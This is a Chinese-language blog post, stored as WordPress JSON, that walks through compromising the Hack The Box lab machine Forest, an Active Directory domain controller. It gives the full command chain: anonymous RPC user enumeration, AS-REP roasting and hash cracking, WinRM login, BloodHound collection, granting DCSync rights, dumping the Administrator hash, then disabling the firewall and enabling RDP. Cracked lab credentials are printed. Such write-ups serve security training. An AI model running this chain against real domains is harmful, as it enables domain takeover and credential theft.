{"id":302,"date":"2025-06-06T12:18:20","date_gmt":"2025-06-06T04:18:20","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=302"},"modified":"2025-06-06T12:18:21","modified_gmt":"2025-06-06T04:18:21","slug":"302","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/06\/06\/302\/","title":{"rendered":"HTB\u9776\u673a Forest \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.10.10.161<\/strong><\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.161 (10.10.10.161) 56(84) bytes of data.\n64 bytes from 10.10.10.161: icmp_seq=1 ttl=127 time=352 ms\n64 bytes from 10.10.10.161: icmp_seq=2 ttl=127 time=374 ms\n64 bytes from 10.10.10.161: icmp_seq=3 ttl=127 time=384 ms\n64 bytes from 10.10.10.161: icmp_seq=4 ttl=127 time=317 ms\n\n--- 10.10.10.161 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 316.749\/356.754\/383.930\/25.869 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Fri Jun  6 08:53:34 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.10.10.161\nNmap scan report for 10.10.10.161\nHost is up (0.38s latency).\nAll 65535 scanned ports on 10.10.10.161 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Fri Jun  6 08:54:22 2025 -- 1 IP address (1 host up) scanned in 47.77 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Fri Jun  6 08:56:42 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.10.10.161\nNmap scan report for 10.10.10.161\nHost is up (0.31s latency).\nNot shown: 65511 closed tcp ports (conn-refused)\nPORT      STATE SERVICE      VERSION\n53\/tcp    open  domain       Simple DNS Plus\n88\/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-06 01:04:09Z)\n135\/tcp   open  msrpc        Microsoft Windows RPC\n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn\n389\/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n5985\/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf       .NET Message Framing\n47001\/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc        Microsoft Windows RPC\n49665\/tcp open  msrpc        Microsoft Windows RPC\n49666\/tcp open  msrpc        Microsoft Windows RPC\n49668\/tcp open  msrpc        Microsoft Windows RPC\n49671\/tcp open  msrpc        Microsoft Windows RPC\n49676\/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n49677\/tcp open  msrpc        Microsoft Windows RPC\n49684\/tcp open  msrpc        Microsoft Windows RPC\n49706\/tcp open  msrpc        Microsoft Windows RPC\n49977\/tcp open  msrpc        Microsoft Windows RPC\nDevice type: general purpose\nRunning: Microsoft Windows 2016\nOS CPE: cpe:\/o:microsoft:windows_server_2016\nOS details: Microsoft Windows Server 2016\nNetwork Distance: 2 hops\nService Info: Host: FOREST; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb-os-discovery: \n|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)\n|   Computer name: FOREST\n|   NetBIOS computer name: FORESTx00\n|   Domain name: htb.local\n|   Forest name: htb.local\n|   FQDN: FOREST.htb.local\n|_  System time: 2025-06-05T18:05:17-07:00\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: required\n|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s\n| smb2-time: \n|   date: 2025-06-06T01:05:20\n|_  start_date: 2025-06-04T19:42:32\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   346.55 ms 10.10.14.1\n2   346.77 ms 10.10.10.161\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jun  6 08:58:53 2025 -- 1 IP address (1 host up) scanned in 131.20 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Fri Jun  6 08:59:28 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.10.10.161\nWarning: 10.10.10.161 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.161\nHost is up (0.28s latency).\nNot shown: 65290 open|filtered udp ports (no-response), 241 closed udp ports (port-unreach)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Fri Jun  6 09:03:30 2025 -- 1 IP address (1 host up) scanned in 241.99 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows Server 2016<\/code>\uff0c\u4e3a\u57df\u63a7\u5236\u5668\uff0c\u4e3b\u57df\u540d\u4e3a<code>htb.local<\/code>\uff0c\u4e3b\u673a\u540d\u4e3a<code>forest<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>DNS\u670d\u52a1\uff0853\u7aef\u53e3\uff09<\/h2>\n<p>\u9996\u5148\u4f7f\u7528<code>dig<\/code>\u5de5\u5177\u786e\u5b9a\u9776\u673a\u7684<code>DNS<\/code>\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">dig any htb.local @forest.htb.local<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749172706973-c652813d-ca01-46cb-934d-f44032be75f6.png\" alt=\"\" \/><\/p>\n<p>\u672a\u53d1\u73b0\u9664\u57df\u63a7\u4e3b\u673a\u540d\u5916\u7684\u5176\u5b83\u89e3\u6790\u8bb0\u5f55\u3002<\/p>\n<h2>MSRPC\u670d\u52a1\uff08135\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>rpcclient<\/code>\u5ba2\u6237\u7aef\u5de5\u5177\u533f\u540d\u8fde\u63a5\u9776\u673a<code>Windows RPC<\/code>\u670d\u52a1\uff0c\u5e76\u6267\u884c<code>querydominfo<\/code>\u547d\u4ee4\u5217\u51fa\u57df\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">rpcclient -U '' -N forest.htb.local<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749173548188-bc531ef1-2669-40c8-a4a3-0125f125534f.png\" alt=\"\" \/><\/p>\n<p>\u8fde\u63a5<code>RPC<\/code>\u670d\u52a1\u6210\u529f\uff01\u5c1d\u8bd5\u6267\u884c<code>enumdomusers<\/code>\u547d\u4ee4\u83b7\u53d6\u57df\u5185\u7528\u6237\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749174056841-bfde4e03-1753-48ca-9e9f-76108f8a4310.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u5982\u4e0b\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-plain\">Administrator\nGuest\nkrbtgt\nsebastien\nlucinda\nsvc-alfresco\nandy\nmark\nsanti<\/code><\/pre>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>AS-REP Roasting\u653b\u51fb<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u901a\u8fc7<code>MSRPC<\/code>\u7684\u533f\u540d\u8bbf\u95ee\u6743\u9650\u83b7\u53d6\u5230\u4e86\u57df\u5185\u7528\u6237\u5217\u8868\uff0c\u73b0\u5728\u76f4\u63a5\u5c1d\u8bd5\u4f7f\u7528<code>impacket-GetNPUsers<\/code>\u811a\u672c\u627e\u51fa\u672a\u542f\u7528<code>Kerberos<\/code>\u9884\u8ba4\u8bc1\u7684\u7528\u6237\uff0c\u4ee5\u83b7\u53d6\u5176<code>AS-REP<\/code>\u7968\u636e\u54c8\u5e0c\u503c\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-GetNPUsers -request -usersfile aduser.lst -format hashcat -dc-ip 10.10.10.161 htb.local\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749175407638-6ac94442-c762-43e3-81b4-f0caa81cd619.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>svc-alfresco<\/code>\u7528\u6237\u672a\u5f00\u542f<code>Kerberos<\/code>\u9884\u8ba4\u8bc1\uff01\u76f4\u63a5\u4f7f\u7528<code>hashcat<\/code>\u5de5\u5177\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 18200 -a 0 \"`$krb5asrep`$23`$svc-alfresco@HTB.LOCAL:74d14d1ef55bc2ed25fa4e82c7ba8ec3`$13fb1582679574166c91c592c1045ae04ec4e18a4fa4c521a36567d864dd2f8f04281358de99bcf4f0ef70a9e28d78bf0ee3c9ec74cc3db9ab4cd2e77433f34092cb07e9109e8456acc11b741770f82b00ccb28ade94bae5676f5708ecd4796dc006e94c29dff420f9bb9741e56f05dca8ec0f429fb1a1d0c4ea773f246599ddb20a56530fbda15456eae96c2a3632abebf55d45959aee9264f283a5962ecba1f53868622c3f0d22dcd8777409abad44e8630465cde5665bc81f79332cd0917f427b63cc2fea3fb7fb3c3b1526f32db586fe20ae0ca6b8dbe0591e1ee12b8a82beebb3eb44ba\" .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749175739683-26e8ee9c-21a3-47a3-83c7-8d6c123771fc.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u57df\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>htb.local<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>svc-alfresco<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>s3rvice<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u4f7f\u7528<code>evil-winrm<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i forest.htb.local -u svc-alfresco -p \"s3rvice\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749177182924-207809a6-0b79-4a8a-a484-15ee4db50168.png\" alt=\"\" \/><\/p>\n<p><strong>\u767b\u5f55WinRM\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u767b\u5f55<code>svc-alfresco<\/code>\u7528\u6237\u540e\uff0c\u4e0a\u4f20<code>ShaprHound.ps1<\/code>\u91c7\u96c6\u5668\u8fdb\u884c\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6\uff1a<\/p>\n<pre><code class=\"language-powershell\">upload ..\/..\/..\/..\/..\/opt\/BloodHound-linux-x64\/resources\/app\/Collectors\/SharpHound.ps1\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted\nImport-Module .\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -OutputPrefix \"svc-alfresco\" -OutputDirectory C:\\Users\\svc-alfresco<\/code><\/pre>\n<p>\u91c7\u96c6\u5b8c\u6bd5\u540e\u4e0b\u8f7d\u538b\u7f29\u5305\uff1a<\/p>\n<pre><code class=\"language-powershell\">download svc-alfresco_20250605195157_BloodHound.zip<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749178007177-6614b241-b7fd-47a1-aac6-5e95f9ad4e60.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u542f\u52a8<code>BloodHound<\/code>\u5206\u6790\u5de5\u5177\uff0c\u4e0a\u4f20\u6570\u636e\u5305\uff0c\u70b9\u51fb<code>Analysis =&gt; Find Shortest Paths to Domain Admins<\/code>\u6309\u94ae\uff0c\u5217\u51fa\u57df\u5185\u6700\u77ed\u653b\u51fb\u8def\u5f84\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749179222101-cdc37f12-3c5c-4303-a2c0-1b9aa71bbdeb.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u653b\u51fb\u8def\u5f84\u56fe\u53ef\u77e5\uff1a<\/p>\n<ul>\n<li>\u5f53\u524d\u7528\u6237<code>svc-alfresco<\/code>\u4e3a\u7528\u6237\u7ec4<code>Service Accounts<\/code>\u76f4\u63a5\u6210\u5458\uff0c\u800c\u8be5\u7528\u6237\u7ec4\u53c8\u662f<code>Privileged IT Accounts<\/code>\u7528\u6237\u7ec4\u6210\u5458\uff1b<\/li>\n<li>\u7528\u6237\u7ec4<code>Account Operators<\/code>\u5bf9\u7528\u6237\u7ec4<code>Exchange Windows Permissions<\/code>\u6709<code>GenericAll<\/code>\u5b8c\u5168\u63a7\u5236\u6743\u9650\uff0c\u800c\u540e\u8005\u53c8\u5bf9\u6574\u4e2a\u57df\u5bf9\u8c61<code>HTB.LOCAL<\/code>\u6709<code>WriteDACL<\/code>\u6743\u9650\u3002<\/li>\n<\/ul>\n<p>\u70b9\u51fb\u5bf9\u8c61\u6309\u94ae<code>Privilege IT Accounts =&gt; First Degree Group Membership<\/code>\uff0c\u67e5\u770b\u5176\u76f4\u63a5\u6240\u5c5e\u7684\u7528\u6237\u7ec4\uff0c\u53d1\u73b0\u8be5\u7528\u6237\u7ec4\u76f4\u5c5e\u4e8e<code>Account Operators<\/code>\u7ec4\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749179606431-eaddd2c2-400b-4426-897c-7ef3382f9975.png\" alt=\"\" \/><\/p>\n<p>\u7efc\u5408\u4e0a\u8ff0\u60c5\u51b5\uff0c\u53ef\u4ee5\u5f97\u51fa\u4ee5\u4e0b\u63d0\u6743\u8def\u5f84\uff1a<\/p>\n<ol>\n<li>\u7531\u4e8e<code>svc-alfresco<\/code>\u7528\u6237\u6240\u5c5e\u7528\u6237\u7ec4\u4e0e\u9ad8\u6743\u9650\u7528\u6237\u7ec4<code>Account Operators<\/code>\u5b58\u5728\u95f4\u63a5\u96b6\u5c5e\u5173\u7cfb\uff0c\u5f53\u524d\u7528\u6237\u5177\u6709\u5bf9\u7528\u6237\u7ec4<code>Exchange Windows Permissions<\/code>\u7684<code>GenericAll<\/code>\u6743\u9650\uff0c\u9996\u5148\u9700\u8981\u4f7f\u7528<code>net<\/code>\u547d\u4ee4\u5c06\u81ea\u8eab\u6dfb\u52a0\u5230<code>Exchange Windows Permissions<\/code>\u7ec4\u5185\uff1b<\/li>\n<li>\u6210\u529f\u5c06\u5f53\u524d\u7528\u6237\u6dfb\u52a0\u5230\u9ad8\u6743\u9650\u7ec4\u5185\u540e\uff0c\u5229\u7528\u8be5\u7528\u6237\u7ec4\u5bf9\u57df\u5bf9\u8c61<code>HTB.LOCAL<\/code>\u7684<code>WriteDACL<\/code>\u6743\u9650\uff0c\u5411\u57df\u5bf9\u8c61\u6dfb\u52a0\u4e00\u6761\u5141\u8bb8\u5f53\u524d\u7528\u6237<code>svc-alfresco<\/code>\u5bf9\u57df\u8fdb\u884c<code>DCSync<\/code>\u64cd\u4f5c\u7684<code>ACE<\/code>\u6761\u76ee\uff1b<\/li>\n<li>\u4f7f\u7528<code>impacket-secretsdump<\/code>\u811a\u672c\u53d1\u8d77<code>DCSync<\/code>\u64cd\u4f5c\uff0c\u8bfb\u53d6\u57df\u7ba1\u7406\u5458\u7528\u6237\u54c8\u5e0c\u3002<\/li>\n<\/ol>\n<h2>\u57df\u5185\u5371\u9669\u5173\u7cfb\u5229\u7528<\/h2>\n<p>\u5728\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u786e\u5b9a\u4e86\u63d0\u6743\u8def\u5f84\uff0c\u4e0b\u9762\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\u6267\u884c<code>net<\/code>\u547d\u4ee4\uff0c\u5c06\u5f53\u524d\u7528\u6237\u6dfb\u52a0\u81f3<code>Exchange Windows Permissions<\/code>\u7ec4\u5185\uff1a<\/p>\n<pre><code class=\"language-powershell\">net group \"Exchange Windows Permissions\" svc-alfresco \/add \/domain<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749181268094-66433ce4-55a2-4895-bb5f-40df34dded9b.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u4f7f\u7528<code>bloodyAD<\/code>\u5de5\u5177\uff0c\u5411<code>HTB.LOCAL<\/code>\u5bf9\u8c61\u6dfb\u52a0\u5141\u8bb8\u5f53\u524d\u7528\u6237\u8fdb\u884c<code>DCSync<\/code>\u64cd\u4f5c\u7684<code>ACE<\/code>\u6761\u76ee\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodyAD --host 10.10.10.161 -d htb.local -u svc-alfresco -p \"s3rvice\" add dcsync svc-alfresco<\/code><\/pre>\n<p>\u6dfb\u52a0\u5b8c\u6210\u540e\uff0c\u76f4\u63a5\u4f7f\u7528<code>impacket-secretsdump<\/code>\u5de5\u5177\u89e6\u53d1<code>DCSync<\/code>\u64cd\u4f5c\uff0c\u8bfb\u53d6\u57df\u7ba1\u7406\u5458\u7528\u6237\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-secretsdump htb.local\/svc-alfresco:\"s3rvice\"@forest.htb.local<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749182074255-fe5e0c3b-a4e1-4767-841d-f4cd2d2fddc8.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97\u57df\u7ba1\u7406\u5458\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>htb.local<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code>\u54c8\u5e0c\uff1a<code>32693b11e6aa90eb43d32c72a07ceea6<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u4f7f\u7528<code>crackmapexec<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u4fee\u6539\u5bc6\u7801\u3001\u5173\u95ed\u9632\u706b\u5899\u5e76\u6253\u5f00\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb forest.htb.local -d htb.local -u Administrator -H \"32693b11e6aa90eb43d32c72a07ceea6\" -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb forest.htb.local -d htb.local -u Administrator -p \"Asd310056\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb forest.htb.local -d htb.local -u Administrator -p \"Asd310056\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>\u6700\u540e\u4f7f\u7528<code>xfreerdp<\/code>\u5de5\u5177\u8fde\u63a5\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">xfreerdp \/v:forest.htb.local \/u:Administrator \/p:Asd310056 \/size:1440x900<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749182829409-e087b18d-a04c-4722-b006-80093bc71c87.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.161 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.161 (10.10.10.16 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-302","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=302"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/302\/revisions"}],"predecessor-version":[{"id":303,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/302\/revisions\/303"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}